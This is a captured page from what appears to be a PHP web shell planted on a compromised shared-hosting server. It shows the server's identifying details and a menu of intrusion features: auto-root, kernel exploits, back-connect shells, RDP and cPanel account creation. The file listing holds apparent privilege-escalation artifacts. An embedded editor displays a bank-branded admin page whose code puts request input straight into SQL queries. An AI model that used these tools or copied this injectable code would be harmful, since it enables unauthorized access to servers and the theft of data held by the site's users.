Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
admin /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
footer.php
1.33
KB
-rw-r--r--
footer2.php
275
B
-rw-r--r--
header.php
2.89
KB
-rw-r--r--
header2.php
1.62
KB
-rw-r--r--
main_content.php
1.72
KB
-rw-r--r--
navbar.php
10.48
KB
-rw-r--r--
navbar2.php
5.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php session_start(); ?> <?php error_reporting(0); if(!isset($_SESSION['sess_admin'])){ header("location: login.php"); } $user= $_SESSION['sess_admin'] ; include("db.php"); include("functions.php"); $link = "../"; include("functions/mobile_detect.php"); $site =$_SERVER["REQUEST_URI"]; $site_name ="ADMIN DASHBOARD"; $current_time = date('y-m-d, h:ia'); // $current_time = date('D, d/m/Y - h:ia', strtotime($current_time)); $_SESSION['sess_admin'] = $_SESSION['sess_admin']; $user = $_SESSION['sess_admin']; $base_url = $_SERVER['PHP_SELF']; $domain_name="www.midwest-tb.com"; $site_name ="Midwestern Trust Bank"; $site_name2 ="Your Financial status is in good hands"; $webmail="support@midwest-tb.com"; $call=""; $site_address =""; $_SESSION ["sess_user"] = $user; ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- Meta, title, CSS, favicons, etc. --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="shortcut icon" href="img/logo.png" type="image/x-icon"/> <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet"> <!-- Custom styles for this template --> <link href="css/sb-admin-2.min.css" rel="stylesheet"> <!-- Custom styles for this page --> <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet"> </head> </div> <?php if(isset($_GET['user'])){ $show = $_GET['user']; $part=explode("@", $show); if($part[1] !=""){ $show = $part[1]; } else{ $show = $_GET['user']; } $sql = mysqli_query($con,"SELECT id FROM users WHERE username ='$show' "); $count = mysqli_num_rows($sql); if($count==0){ header("Location: user_error.php"); } } $time = date('y-m-d'); $current_time = date('y-m-d, h:ia'); $get_help ="RECIEVE DONATION"; $pay_help="GIVE DONATION"; $ph_message="YOU HAVE BEEN MATCHED TO PAY THIS USER"; $msg_sql = "SELECT id FROM messages WHERE recipient ='$user' && status='unread' "; $msg_run= mysqli_query($con,$msg_sql); $msg_check= mysqli_num_rows($msg_run); $sql = "SELECT * from users WHERE username='admin' "; $run= mysqli_query($con,$sql); $admin_check= mysqli_num_rows($run); if($admin_check==0){ $sql="INSERT INTO users(username, role, fullname) VALUES ('admin','superadmin', 'Site Admin')"; $result = mysqli_query($con,$sql); } ?> <style type="text/css"> a{ font-weight: bold!important; } </style>
Close